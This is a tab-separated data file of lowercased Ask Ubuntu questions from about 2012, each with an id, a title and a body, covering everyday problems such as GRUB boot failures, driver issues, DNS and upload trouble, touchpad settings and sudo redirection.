229203	run 12.10 and 12.04 off same home partition	this is a weird one and i apologize if this is a duplicate question , i looked but could n't find a answer . i upgraded to 12.10 and it works with the side that i have to use the open ati driver cause my card is n't supported anymore so i want to install 12.04 along side 12.10 but use the same home partition . is this safe or even advisable ?
229204	audio codec consuming high battery power	my powertop reports this for the two audio codec components . 4.85 w 100.0 % device audio codec hwc0d3 : intel 4.85 w 100.0 % device audio codec hwc0d0 : realtek i think 10 w for audio is too high . can somebody please suggest me a way to reduce the power consumption ? it 'd be nice if someone could educate me on this , i have an idea about codecs in general but i have no clue about their internals ? why is it that these two components keep running always even when i am not listening to audio ?
229207	kfp file in ubuntu ?	my print shop provides a kfp file for checking a pdf for print readiness . it seems that this file can be imported into acrobat professional ( keyword : preflight profile ) , but is a kinko 's file prep tool file . is there any way of checking a pdf with a kfp file in ubuntu ?
229209	stream my movies to my nexus7 and other devices ?	i am running kubuntu 12.10 and have a 350gb hard drive that has a bunch of videos on it and i am wondering if it is possible to stream the movies over my local network . i think it would be really cool if there was a way to do this so i could wathc the movies wherever i want on my nexus 7 . is this possible ? does it make sense what i 'm looking to do ? thanks in advance , jonathan
229212	vlc 2.0.3.. ca n't enable http interface	i 'm new to linux world , and happy with my ubuntu 12.04 64-bit server . i am working in a re-streaming project and got stuck around access the stream in the server . already fixed quite issues , except the web interface ! all the methods i found is about a gui preferences panel . what about the command line ? any help ?
229214	question for class	i have a question for class that i can not figure out , i was hoping the helpful folks at ask ubuntu could help . the question is basically this : your linux system appears to have a dhcp problem . you decide to release and renew the dhcp lease by running the following command `` sudo ifconfig eth0 down '' . the command gives an error message saying linux does n't recognize the command . what 's the problem ? any ideas ? thanks in advance .
229217	lost sound to headphone jack after recent update ( ubuntu 12.04 )	after a recent update , i lost all sound to my headphone jacks on an hp pavilion dv6 . not sure where to begin . does anyone have any ideas ? the external speakers on my laptop work fine .
229222	pcmanfm displays duplicate drive entries in sidebar , how do i fix this ?	pcmanfm is displaying duplicate drive entries in the sidebar . this occurs even if the drives are not mounted and at times will display 3 to 4 drive duplicates . how do i fix this ?
229223	data loss v v important	recently i installed ubuntu 12.10 and while installing , selected erase disk by mistake . now i am only shown a 500gb empty space . the previous os winxp , 5 years of music , games , documents , software -- everything is gone . please help me recover the data . provide a detailed guide as i am a first time ubuntu user , know nothing about installing software , packages . i do n't know a thing about linux .
229224	files copied to folder in var/www disappears on restart	i have a lamp server setup . i have the source folder in my desktop which i can edit without 'sudo'ing . then , i sync the files to var/www using sudo rsync . i gave the folders in var/www necessary permissions ( 770 for the mentioned folder , since www-data is added to root group , and apache has to write to this directory , that is upload directory ) . it works well . but , when i restart the computer , files in the upload folder in var/www disappears . i can not understand what is happening . drwxrwxr-x 2 root www-data 4096 dec 15 08:26 uploaded_files my folder permissions look like this . edit : the files disappear some time after the upload . i 'm just confused like hell . any help will be appreciated . i 'm a newbie in linux file , folder permission btw . thanks .
229226	how to enable vsync ?	ok . so i 'm trying out linux today and noticed some tearing on my desktop . you know , like playing a pc game and vsync is n't enabled . this problem is most prominent when i 'm scrolling down my browser . is there a fix ? ( 'm using the latest version of ubuntu , with all the updates downloaded )
229240	is it possible to change the icons in xfce trough the terminal ?	i ca n't seem to find a correct way to do this from the terminal . i 've tried with gsettings but nothing changes , i also tried with gconftool2 but again nothing happens . does xfce even support this ?
229241	keyboard shortcuts misbehavior gnome 3.6	i 've enabled few keyboard-shortcuts and they work weird . shortcuts with ctrl+alt+ i 've enabled `` ctrl+alt+c '' to open a google-chrome browser works only when i hold the ctrl+alt for a while . works fine for default shortcuts like lock-screen ( ctrl+alt+delete ) and gnome-terminal ( ctrl+alt+t ) shortcuts with `` super '' + i 've enabled `` super+f '' to open a google-chrome browser with facebook url works only if i press `` f '' twice without releasing the `` super '' key can someone help me fixing the issue ( or ) confirm this behavior/bug ? os - ubuntu 12.10 gnome - 3.6 ( ppa )
229242	i ca n't get ubuntu ( 12.10 desktop ) to recognize my galaxy s3	i plug my gs3 into my laptop , and nothing happens . i went to terminal , typed `` lsusb '' command , and the return print was , for one of the usb ports , `` bus 002 device 015 : id 04e8:6860 samsung electronics co. , ltd gt-i9100 phone [ galaxy s ii ] , gt-p7500 [ galaxy tab 10.1 ] '' . my device is neither the s2 or the galaxy tab . any ideas on how to get this working ?
229243	change the icon for one specific file ( from the command line )	in ubuntu , is it possible to change the icon for a specific file from the command line ? i want to create a shortcut with a custom icon , so i 'll need a way to change a specific file 's icon . ( instead of changing the icon associated with a filetype , i want to change the icon associated with just one specific file . )
229244	provide gnome online account	i am thinking about writing an android-gnome sms utility . the cleanest way to do that seems to be by providing an online service that syncs with android and can be added as `` online-account '' in gnome3 . however , i am gaining the impression that such online accounts are not intended to be added by third-party software in gnome . is that correct ? if not , how can i do that ?
229245	changing ubuntu to windows xp on netbook	i have a problem , because lately i installed ubuntu on my netbook and i decided that it worked faster with windows xp and i would like to go back to it , but i do n't know how to remove ubuntu from my hard drive without an live cd ( because i do n't have an cd-rom ) . i tried to find a solution , but i did n't find it anywhere . i would be thankful if somebody could help me .
229247	does system update also update the os ?	if i update my ubuntu 12.04 through update manager , does it update to the ubuntu 12.10 ?
229248	i want toreturn to gnome 3.4 from gnome 3.6 in ubuntu 12.04	i installed ubuntu 12.04 and excited to experience gnome 3.6 . so i add repository and upgraded , but i think i have some graphical problem , so i prefer back to gnome 3.4 , i search in google but i ca n't find a good article ?
229254	how do i determine an application 's process name ?	this is the situation : working on ( the next version of ) a unity quick list editor , i would like to add a reliable way of `` restarting '' launcher icons . to do so , i need to remove the icon ( editing gsettings ) and replace it on the same position . so far no problem . however , if the application in question is running , user will possibly lose data , as the application will quit when it 's icon is removed from the launcher . what i need is a reliable way to find an application 's process name , to let the editor check in the list of running processes if the application is running , and send a warning message to the user that the icon can not be restarted if the application is running . what i did so far is make the editor look into the desktop file , to read the command , also read the command , stripped from the directory section , and furthermore look into possible remote scripts the desktop file command might refer to , looking for strings starting with `` ./ '' although the method seems to work well with all applications i tested it on , i have the feeling there must be an easier way to cover the problem in an `` all in one '' way ... is there ? also suggestions to catch more exceptional situations are welcome !
229259	i ca n't upload out of proxy chanels , but i can download & open pages well ?	this problem is annoying me for 2 weeks ! unexpectedly , after migrating to ubuntu i ca n't upload any thing via adsl , also i ca n't send any comment in weblogs . the odd point if i use proxy/ant-ifilter ( as in tor or freegate ) i can upload normally ! ! the upload is just my problem ; downloading files and opening pages are ok ! also when i use gprs ( mobile internet ) i do n't have any problem ! ! ! there 's not any problem in windows : both download and upload are ok , using adsl line . my line : adsl ( send rate : 512 kbit/s , receive rate : 2048 kbit/s ) my modem : d-link 2520u my installed operating systems are both ubuntu 10.04 & 12.04 . i also checked `` uploading '' on 10.10 , 12.04 and 12.10 in live mode = > failed ! my browsers : firefox 17.0.1 and opera what does upload mean in this case ? am i test a file to upload using ftp or trying to attach a file in gmail ? i ca n't comment on weblogs and forum in any case ! ( but using proxy it is ok ) i ca n't upload a file to uplod-center sites in any case ! i can upload to images.google.com but using proxy it works a few better ! i can open all web pages ! the below picture is the result of my attempt to attaching a file to aol using thunderbird . but my try for gmail was successful ! it seems there is not any problem with gmail services ! ! ! ftp : i could upload a txt file ( 10 kb ) , but in next attempts for uploading a bigger file ( pdf : 2mb ) , i could n't ! ( using filezilla ) result of ping 4.2.2.4 is here : naik @ kian : ~ $ ping 4.2.2.4 ping 4.2.2.4 ( 4.2.2.4 ) 56 ( 84 ) bytes of data . 64 bytes from 4.2.2.4 : icmp_seq=1 ttl=50 time=204 ms 64 bytes from 4.2.2.4 : icmp_seq=3 ttl=50 time=205 ms 64 bytes from 4.2.2.4 : icmp_seq=4 ttl=50 time=204 ms 64 bytes from 4.2.2.4 : icmp_seq=5 ttl=50 time=203 ms 64 bytes from 4.2.2.4 : icmp_seq=6 ttl=50 time=202 ms i installed `` nload '' and glance its output in terminal during uploading a file . the below picture was captured during upload-progress from nload output : it shows that i have upload , but i did n't get the final link . firefox was showing me that is trying to upload and nothing . i also try to post here without proxy , nload showed me there is upload but my comment was n't sent at last ! it 's weird ! ! ! what more information do you need around this problem ?
229266	ubuntu wo n't boot on windows starter	i installed ubuntu 12.04 lts yesterday from a usb , but it only boots into windows unless the usb is in , then it boots into the ubuntu loader where i can choose ubuntu vs. windows . what 's the problem ? i run windows starter on a netbook with 1 gb ram and intel atom processor . i tried to install boot-repair but it wo n't work either . i follow the instructions for the terminal and it seems to go right until i try launching it - then it says that it does not know the command boot-repair . i really like ubuntu , it lets this netbook run smoothly and better than ever before but i do n't think i want to boot from a usb every time .
229268	how to change system time or force a sync with hardware clock	my laptop is probably running out of cmos battery , i know i have to fix it soon , but until then , this very annoying issue keeps me from using it . scenario : my system clock is reset to 15/12/08 11:00 am every time i turn on my computer . this has all sorts of side-effects , one of the more annoying being that i ca n't log into my gmail . at first i just waited for a time sync to happen , as i have that activated and all . it never happened . i googled and did n't find any way of enforcing a time sync , which i found very strange . is there really none ? setting the time and date by hand is also a problem . for my 12.10 installation , the time & date settings are bugged . i remember it being for my last , older installation as well , though . of course the easiest way should be to just manually edit the date and time fields by entering a new date . this is possible in theory , but the changes are reverted as soon as the text boxes loose focus . the other way to do it is to click the +-buttons for a long , long time . the first time i did that , the changes were n't stored either . i found out that afterwards i have to switch from manual to internet-sync mode and wait ~5 seconds until the in the top left corner of my system the new time is shown , or otherwise it wo n't have effect . so a nice solution would be one of the following : setting the time/date by hand , maybe via terminal , so i can just enter the right values . or , a command that would enforce an immediate time sync , that i can run after booting . i know i have to change the batteries soon , but this is seriously keeping me from working ...
229269	firefox installed on my ubuntu 12.04 machine but i am unable to connect to the internet ( nobody know ? ? ? )	every other browser installed is working fine.. ! except this firefox . what are the things that i need to check , to make firefox work on my computer . i am a newbie for ubuntu . i tried googling not got enough and clear information . please help me . thanks in advance.. ! this is the error that i am getting just before launching of the application.. ! could not initialize the application 's security component . the most likely cause is problems with files in your application 's profile directory . please check that this directory has no read/write restrictions and your hard disk is not full or close to full . it is recommended that you exit the application and fix the problem . if you continue to use this session , you might see incorrect application behaviour when accessing security features .
229270	nvidia fx5200 ca n't set resolution upper than 800x600	when i install nvidia drivers from terminal with this command : sudo apt-get install nvidia-current ... and i reboot , i get the max . resolution 800x600 . i added new mode successfully with xrandr , but my display is 480p . my display is connected to my pc with hdmi and in windows i was have vga resolution on hdmi but after i installed in ubuntu the drivers , the resolution is 480p.how to fix that ? and can i change the 420p to 720p or 1080i ? because my display have option `` hdmi full pc mode '' which is good because i can see my display fully , but the full pc mode is not supported for 480p . ubuntu : 12.04 precise pangolin
229271	grub rescue command problem	i did originally have ubuntu installed on my laptop , however i then installed joli os , since i did not want it any more , i formatted the disk which had joli os on , thinking that it would revert back to the original ubuntu boot loader . however when i boot my laptop , it comes up with : grub rescue > any ideas ? many thanks
229272	how to automount ntfs usb sticks on xubuntu 12.10 ?	i 'm running the xubuntu 12.10 on a lenovo t520 laptop . if i plug a fat formatted usb stick , it 's mounted automatically , but if i plug in a ntfs formatted one , i have to mount it manually . how to make ntfs usb sticks to mount automatically when plugged ? my /etc/fstab in case it helps : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda1 / ext4 errors=remount-ro , user_xattr 0 1 # swap was on /dev/sda5 during installation uuid=cd221c3e-44a8-459e-9dfb-04787f1cd0b6 none swap sw
229274	problem resolving many of the web pages	i am presently running ubuntu 12.04 and using chrome/firefox along with opendns ( have tried google public dns as well as dns of my isp ) . suddenly , a lot of websites that i visit frequently do n't load anymore . some of them are imgur , yahoo , fed-sudoku , microsoft and addons page of firefox . i am sure there are many more that wo n't load . i have windows 7 in dual-boot and there are no problems whatsoever in opening these pages on windows . brief history 2 weeks back i installed ubuntu 12.10 . i faced this issue right-away on ubuntu 12.10 . i thought something must have went wrong with the installation , so i removed ubuntu 12.10 and instead installed lubuntu 12.10 on it . but the same issue persisted on lubuntu as well . so , i tried opening these webpages in live environments ( of ubuntu 12.10 , lubuntu 12.10 and ubuntu 12.04.1 ) from usb . the issue was there for ubuntu 12.10 and lubuntu 12.10 . however , i was able to access these webpages from ubuntu 12.04.1 . so , i installed 12.04.1 on my harddisk . everything on 12.04 was fine till yesterday ; but suddenly , these sites do n't load anymore . all this while , windows 7 in dual-boot works flawlessly . please help me resolve this issue . updates ( 1 ) in response to zhang 's answer to check basic terminal commands - i have used both opendns and googlepublic dns to test these commands ( restarted my pc in between ) . these are the terminal outputs while using opendns and while using googlepublicdns . ( 2 ) this is the result of ifconfig - pastebin link . ( 3 ) thereafter i tried to use wget to check if the problem was with the browser . however , it did n't work for webpages which are not loading in my browser . this is the pastebin link showing it for google ( works ) and yahoo ( does n't work ) . ( 4 ) then followed the instructions listed at noobslab to disable ipv6 . also , restarted my pc . however , it did n't help either . ( 5 ) then , i edited my wired connection through network-manager to ignore ipv6 . after that , i tried to open yahoo in browser - it did load the first time . however , when i tried again , it did n't load . other problem sites did n't load at all . ( 6 ) again tried wget . however , this time passed the argument -4 to it ; ie ; wget -4 www.yahoo.com . but once again , did n't get any response . ( 7 ) then , tried to fiddle with mtu . followed this link to check what is the maximum that i can set . for me , the maximum possible was 10324 . also tried other values like 1500 , 1492 , 1452 and 100 . but this did n't help either . ( 8 ) re-installed ubuntu 12.04.1 , wiping out the previous installation and as such all other changes . also installed all the available updates . for the first half-an-hour , i was able to load all the webpages - including the ones which had problem . but lateron , i have the same issue as earlier - not able to load pages like yahoo , imgur , microsoft , fed-sudoku , etc . ( 9 ) question by laurent from wget pastebin info in the question , the problem is not dns as the wget and dig commands reach yahoo 's ip . this said , i do n't know why nothing downloads with wget ! have you set a firewall ? ( you can check with sudo iptables -l ) . in ifconfig results , there are 2 interfaces , ppp0 and eth0 . which one should be used to connect to internet ? could you post the result of route command ? obs : eth0 has no ipv4 address so i think it is not properly configured ( how is /etc/network/interfaces ? ) â laurent reply by me here is the pastebin link for terminal outputs of sudo iptables -l ; route and cat /etc/network/interfaces . i am not running any firewall . its a clean install of ubuntu 12.04.1. ppp0 is used to connect to the internet ( this takes username and password which was given by my isp ) and eth0 is the intel 's onboard lan which connects the modem through ethernet port . ( 10 ) tried to append nameserver 208.67.222.222 line in /etc/resolv.conf ( since , i am using opendns ) . but this did n't help ( even after restart ) . so reverted the changes back . - [ this is also a part of answer provided by laurent - it 's required if i want to use opendns ] . other info i have an adsl modem ( not a router ) connected to the pc with an ethernet port . to connect to the internet , i have a dsl connection . so , i use pppoe to connect . terminal output for system information sudo lshw -c network ; cat /etc/resolv.conf ; ifconfig -a - pastebin link
229287	how do i make ubuntu appear as a bluetooth keyboard ?	i have an ipad 2 and would like that my ubuntu system appear as a bluetooth keyboard for it , so that what i type on my computer appears on my ipad . is there a specific way to do that ?
229290	before making a clean install , how do i detect configuration changes in the current system ?	i have a five year old ubuntu system that i 've been upgrading , mostly cleanly , but recently there is too much crud in the os . i 'm planning to do a clean install to lubuntu 12.10 . however , i do n't want to lose any of my system configuration . luckily , /home is in its own partition . i do know most of my configuration changes are in /etc/ so i will definitely make a backup of that directory . is there any script or tool which will let me detect changes made in the os configuration directories ( essentially , detect if there is a diff ) so i can more safely do my clean install . i 'm sure without it , i could rebuild a system , but it would definitely save me a lot of time if i knew what has changed .
229294	ca n't see all my devices any more on ubuntu one	after a new installation of ubuntu 12.04 i ca n't see my devices on ubuntu one any more . on my laptop all devices are displayed but not on my pc . i got 20 gb of storage this addional storage is gone too together with my purchased music . any idea to solve this ? thank 's a lot !
229296	asus n56vm ssd boot issues	new asus n56vm laptop with an ssd ( samsumg 830 ) installed instead of the hdd it came with . ubuntu is the only os installed on it and its installed in efi mode . the problem is that it will boot maybe 9 out of 10 times if an usb device ( such as a mouse ) is connected before powering up . if no mouse then it will 9 out of 10 times hang right after the grub menu ( saying `` loading initial ramdisk '' ) . no logs are beeing written to /var/log so there 's nothing to google on , i 've experimented with with booting into rescue mode , setting/unsetting several grub flags ( noacpi , disable graphical boot etc ) but nothing has worked so far . in the bios i can see 2 boot options of the sdd ( 2 ubuntu with identical names ) . booting of the second in the list reverses the issue above ( 9 out of 10 times it will boot without the mouse attached ) . i 've tried this fix : which kind of touches on the subject ( but did not solve the issue ) . i have run boot-repair on it , and when i did a third boot option off the hard disk appeared , but still the same behaviour as above . aany hints on how to solve this ?
229299	after fresh install of server 12.04.01 i get `` temporary failure resolving 'us.archive.ubuntu.com ' '' . how to fix ?	just installed server 12.04.01 with lamp and now i am looking to add phpmyadmin and php-pear . i ca n't install them . sudo apt-get update ( works fine ) sudo apt-get install phpmyadmin yields many messages like : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/universe/p/phpmyadmin/phpmyadmin_3.4.10.1-1_all.deb temporary failure resolving 'us.archive.ubuntu.com' failed : command not found
229301	how to boot windows 8 after installing ubuntu 12.10 ?	my computer can not load windows 8 using grub after the installation of ubuntu 12.10 . when i select windows 8 ( loader ) ( on /dev/sda1 ) it takes the user back to grub os-selection screen . how to recover back ?
229306	ping from one network host to another network host	need the help to ping vice versa from one network to another network . in between there is 1 ubuntu server . eth0 is connected with 192.168.88.0/24 and eth1 is connected with 192.168.100.0/24 network . i want to ping from 192.168.88.99 to 192.168.100.2. route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.88.1 0.0.0.0 ug 100 0 0 eth0 192.168.88.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.100.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 ifconfig âa : eth1 link encap : ethernet hwaddr 00:50 : b6:56:1c:35 inet addr:192.168.100.1 bcast:192.168.100.255 mask:255.255.255.0 inet6 addr : fe80 : :250 : b6ff : fe56:1c35/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:656 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:48334 ( 48.3 kb ) tx bytes:41896 ( 41.8 kb ) eth0 link encap : ethernet hwaddr 00:13 : a9:8f : d7:06 inet addr:192.168.88.254 bcast:192.168.88.255 mask:255.255.255.0 inet6 addr : fe80 : :213 : a9ff : fe8f : d706/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1109 errors:0 dropped:0 overruns:0 frame:0 tx packets:863 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:237787 ( 237.7 kb ) tx bytes:93132 ( 93.1 kb ) interrupt:18 i can ping from the machine 192.168.88.99 to 192.168.88.254 and 192.168.100.1 but can not ping 192.168.100.2 . in the same way i can ping from the machine 192.168.100.2 to 192.168.100.1 and 192.168.88.254 but can not ping 192.168.88.99. iptables âl : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination cat /proc/sys/net/ipv4/ip_forward : 1 ufw status : status : inactive
229309	how to use sudo with pipelines ?	let 's say i want to add some line into /etc/profile . i try : $ sudo echo `` something '' > > /etc/profile bash : /etc/profile : access forbidden of course i could write : $ sudo su # echo `` something '' > > /etc/profile and this works , however it does not work within a shell script . so , what is the right way ?
229311	synaptics touchpad : solving 2 finger problem triggered by resting palm	my laptop is : `` lenovo g580 '' and it comes with a very sensitive touchpad . specially , when i place my hands comfortably to type , it `` thinks '' i 'm touching the top-left corner . this becomes really annoying when i have to use both ( the keyboard and touchpad ) , as it thinks i 'm performing a 2 finger click ( the mouse stop moving ) . i have disabled the 2 finger click , which defaults to right click , in order to prevent the right-click-menu randomly ( imagine that ! ) . using xubuntu 12.10 . these are my settings : leftedge = 2300 rightedge = 5000 topedge = 1652 bottomedge = 4658 fingerlow = 25 fingerhigh = 30 fingerpress = 256 maxtaptime = 180 maxtapmove = 242 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 110 horizscrolldelta = 110 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.036324 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 440 edgemotionusealways = 0 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 0 rbcornerbutton = 0 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 0 tapbutton3 = 2 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 1 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 8 verthysteresis = 8 clickpad = 0 what i have tried : 1 ) the `` circularpad '' option could solve my problem , but for some reason it does n't work : ( 2 ) palm detection seems to fail as well ... ( currently disabled ) 3 ) the `` block touchpad while typing '' option resulted annoying as well , as i often use both input methods at the same time ( like when you are searching for a file in a directory and type part of its name , and then clicking on the correct file ) . with that option , i have to wait about 3 secs in order to be able to use the touchpad , which i think is too much . 4 ) i could disable 2-finger scroll , but i use it a lot . 5 ) i thought that changing the edges could be the easy way to go . i checked x and y values in : `` synclient -m 100 '' , and change the leftedge and rightedge values as shown above . but even after setting them ( using synclient leftedge= ... ) the cursor still moves below the leftedge and after the rightedge , what am i doing wrong ? it seems that many options have no effect ( like tapanddraggesture ) , while changing others do ( like setting 3 finger middle-click , etc. ) . is that possible ? what other alternatives could i try to solve it ? thanks in advance !
229316	wifi - wireless network not working after installing ubuntu 12.04	i had installed ubuntu 12.04 in my dell vostro 3460 . initially wired as well wireless both are not working . after installing compat-wireless-2012-07-03-pc.tar.bz2 wired network fine but wireless is not working . previously both were working fine with ubuntu 11.10 . also presently both network are working fine in win7 . lspci : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.4 pci bridge : intel corporation panther point pci express root port 5 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 0de9 ( rev a1 ) 02:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) 03:00.0 ethernet controller : atheros communications inc. ar8161 gigabit ethernet ( rev 10 ) iwconfig : lo no wireless extensions . eth0 no wireless extensions . ifconfig : eth0 link encap : ethernet hwaddr 84:8f:69 : d4:35:9b inet addr:10.24.22.72 bcast:10.24.31.255 mask:255.255.224.0 inet6 addr : fe80 : :868f:69ff : fed4:359b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:15332 errors:0 dropped:0 overruns:0 frame:0 tx packets:10425 errors:0 dropped:0 overruns:0 carrier:1 collisions:0 txqueuelen:1000 rx bytes:9262594 ( 9.2 mb ) tx bytes:1572030 ( 1.5 mb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1432 errors:0 dropped:0 overruns:0 frame:0 tx packets:1432 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:145656 ( 145.6 kb ) tx bytes:145656 ( 145.6 kb )
229317	jdk 6.0 update 6 installed sucessfully but java command not working	i switched to linux ( ubuntu 12.04 ) this morning and find it great but messed up while installing java . : - ( . i have installed jdk6.0_6 successfully but when i run java command in terminal , i get this ravi @ ravi-lifebook-ah531 : ~ $ java the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * openjdk-6-jre-headless * gcj-4.5-jre-headless * openjdk-7-jre-headless try : sudo apt-get install < selected package > could someone help me with this ? below are the steps that i followed to install : copied file named jdk-6u6-linux-x64.bin to my documents from terminal executed chmod a+x jdk-6u6-linux-x64.bin and then executed sudo ./jdk-6u6-linux-x64.bin in terminal i accepted the license agreement and done .
229319	i was playing with grub a bit ... a bit more	i was playing with grub on my computer a bit more . then i tried to reboot and i ca n't enter my operating systems ( windows and ubuntu ) . it looks like i 've rewritten something very important because it only shows me grub command line and i do n't know how it boot . i 've tried to set root and then load vmlinuz , but it tells me that i need to specify some root option correctly . i was doing a lot of things with grub and i do n't remember every think . i just remember that i tried something like grub-mkconfig recheck . i was also editing grub.cfg . i have also tried to read grub.cfg by cat and it looks normally .
229323	no usb or dvd drive and not able to migrate wubi ( no clue )	i recently installed ubuntu 12.10 on my old and dying but reliable laptop alongside and installation of windows 7.my laptop is not able to boot from the dvd drive or from the usb ( my arrow keys dont work at all so therefore i 'm unable to go into bios and change the boot order ) . i first installed ubuntu 12.04 on a separate partition using wubi and then upgraded to 12.10 . i would love to be able to delete my windows partition and just use ubuntu.it has really given life to my computer as i ca n't afford to buy one for anytime soon . i tried to migrate wubi but i was so thoroughly confused and disturbed at how hard this was that i just stopped . i have absolutely no options.if someone could please offer a solution or a really dumbed down explanation of migrate wubi it would be greatly appreciated . thanks
229324	firefox keeps crashing	when i open firefox it crashes about 5 seconds later , and this is the error : add-ons : globalmenu % 40ubuntu.com:3.6.4 , langpack-en-gb % 40firefox.mozilla.org:17.0.1 , langpack-en-za % 40firefox.mozilla.org:17.0.1 , langpack-zh-cn % 40firefox.mozilla.org:17.0.1 , ubufox % 40ubuntu.com:2.6 , % 7b972ce4c6-7e08-4474-a285-3208198ce6fd % 7d:17.0.1 buildid : 20121129151842 crashtime : 1355583809 emcheckcompatibility : true framepoisonbase : 7ffffffff0dea000 framepoisonsize : 4096 installtime : 1355581168 notes : opengl : x.org -- gallium 0.4 on amd rs780 -- 2.1 mesa 9.0 -- texture_from_pixmap productid : { ec8030f7-c20a-464f-9b0e-13a3a9e97384 } productname : firefox releasechannel : release secondssincelastcrash : 598 startuptime : 1355583804 theme : classic/1.0 throttleable : 1 url : http : //shop.ubuntu.com/ vendor : mozilla version : 17.0.1 this report also contains technical information about the state of the application when it crashed .
229327	keylock-indicator for ubuntu 12.10	before ubuntu 12.10 i used to install from terminal the keylock-indicator . many keyboards lack this feature and every time that i have to type a password , i need to check if the capslock key is on or off . is there a new version for the keylock-indicator ?
229328	can not authenticate form system tools	whenever i try to run a program from gnome , i get messages like authenticated is required to run the gparted partition editor the same goes for all programs that need root permission and i try to run from 'system tools ' in my gnome-fallback . however the same user can become root in gnome terminal with no problem ( i added the user to sudoers ) . i must mention that i 've changed the user 's password after os install , so i think i need to update something but do n't know what . i appreciate your hints .
229329	how to organize my 1000s of pdf ?	i have a huge collection of pdf . mostly it consists of research papers , of self-created documents but also of scanned documents . right now i drop them all in one folder and give them precise names with tags in the filename . but even that gets impractical , so i am looking for a pdf library management application . i am thinking of something like yep for mac , with the following features : pdf cover browsing ( with large preview , larger than nautilus allows ) tagging of pdf ( data should be readable cross-platform ) possibility to share across network ( thus rather flat files than database ) if possible : cross-platform mendeley seemed to be a good choice , but i am not only having academic papers and do n't want to fill it all metadata that is required there . the only alternative i could find thus far is shoka , but the features are limited and developments seems to have stopped already .
229330	two screens in ubuntu 12.10	users , at work i 'm using ubuntu now for a while . i always try to keep the system up-to-date , so i also made the upgrade from 12.04 to 12.10 in october this year . in 12.04 , i had some trouble making the two screens i have in front of me display the right things in a proper way . after upgrading , ubuntu 12.10 shot my screens ! the bigger one with the better resolution was just mirrored from the low-res , smaller screen , so as a matter of fact they were useless . i went to the settings and tried to fix it , but as my system does n't have any graphics-hardware ( remember , it 's a simple workstation ) , it said that this was to large of a desktop and i should switch to the good-old 2d-gui they used to have . but : it is n't there ! after a short time of research i found out that they did n't keep the old 2d-layout . and the 3d one is a troublemaker for small systems with no graphic card . is there any possibility to fix this problem , to reactivate the old gui ? i do n't want to downgrade again 'cause i like being up-to-date , but if keeping 12.10 means working with one screen , i will have to get back . i hope anyone can help me . thanks in advance , dave p.s . : if you 're missing any information , let me know what it is , i 'll be glad to provide them as soon as i can ! typed lspci -nnk | grep -i vga -a2 to the terminal and it answered : vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rv370 5b60 [ radeon x300 ( pcie ) ] [ 1002:5b60 ] subsystem : advanced micro devices [ amd ] nee ati device [ 1002:0402 ] kernel driver in use : radeon
229332	why cant i install xubuntu using wubi installer ?	i have tried a couple times to install xubuntu using wubi . all i get is this error : an error occurred : can not download the metalink and therefore the iso for more information please see log file : c : \user\appdata\local\temp\wubi-12.04-rev269.log please help ! ! !
